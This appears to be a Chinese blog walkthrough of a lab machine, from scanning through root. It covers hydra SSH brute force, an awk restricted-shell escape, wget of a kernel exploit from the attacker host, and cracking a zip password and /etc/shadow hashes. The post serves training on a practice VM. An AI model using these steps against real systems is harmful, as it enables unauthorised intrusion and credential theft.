好久没写过文章了,一次来一个实战的靶机渗透教程.

练习靶机的好处可以让你在接触实操的时候不会手忙脚乱不知道该先怎么用,光知道理论永远成为不了一个优秀的大牛.

靶机下载地址

https://pan.baidu.com/s/1wTPr1dr1hi1lzTFFu3u3Cg提取码:778f

导入靶机后用pingman扫描靶机ip

!/bin/bashif [ "$1" == "" ] thenecho "Usage:./pingman.sh [betwork]"echo "Example:./pingman.sh 192.168.1"elsefor ip in `seq 1 254`; do    ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | sed 's/.$//' & donefi

此处ip

靶机:192.168.1.3

kali:192.168.1.5

第一步nmap扫

nmap -A -sS -Pn -p- 192.168.1.3

1

这里可以看到靶机只有ssh和apache两个服务

进入192.168.1.3:8180可以看到一个nginx初始网页

2

没有什么可以看到的好东西

dirb目录爆破

由于用dirb http://192.168.1.3:8180/也爆不出什么可用网页于是用工具自带的大字典进行爆破

locate dirb—–查看有关dirb的目录位置

big.txt可以用这个找到

img

这里可以看到apache指定网页的存放路径

我们将自己的hosts文件中的加上域名

192.168.1.3 mario.supermariohost.local

img

这里是一个没有马里奥的游戏

由于个人原因,这里靶机ip为192.168.36.195

因为上面的东西也没有什么特别有价值的所以我们用御剑再爆一次

dirbuster

img

这里发现了两个新的网页

command是一个查询用户名的界面,这个界面可以想想之前的ssh服务说不定是这个用户名登录的

luigi里面是一封信

…截图太麻烦所以这里两个页面留给大家自己实践去查看

这里不知道为什么在command.php中怎么也爆不出用户名(可能是作者故意设置的一个坑)

字典生成

cewl mario.supermariohost.local:8180/luigi.php -w /root/user.txt

img

john --wordlist=user.txt --stdout --rules >pass.txt

img

有了字典之后我们就能进行ssh爆破了

hydra ssh爆破

hydra -L user.txt -P pass.txt 192.168.36.195 ssh -t 4 -V

这个过程有点长…..

img

有了帐号密码当然ssh连接看看呀

img

这里发现有些命令执行不了,管理员做了限制.在终端输入?查看可以使用的命令有awk.好嘞,你等着!!!

awk权限绕过

awk 'BEGIN{system("/bin/bash")}'

img

成功绕过后我们查看内核版本信息,发现是3.13.0的老系统,回到kali找exp进行提权

img

靶机下载做好的提权脚本

wget 192.168.36.208/exp3.13

img

有了root权限后使用python切换shell

python -c 'import pty;pty.spawn("/bin/bash")'

在/root下找到flag.zip,发现有密码,继续放到kali进行解密

img

zip解密

fcrackzip -D -p rockyou.txt -u /root/flag.zip

img

查看flag

img

这里作者最后让我们把所以的密码都明文解密出来

把/etc/shadow下的root mario luigi copy出来放到kali进行john解密

john --wordlist=rockyou.txt userpass.txt

好了所有的内容都做完了,整理总结,最后密码懒得发图,交给大家自己实践了,哈哈哈



Kali学习笔记      网络安全 靶机

本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!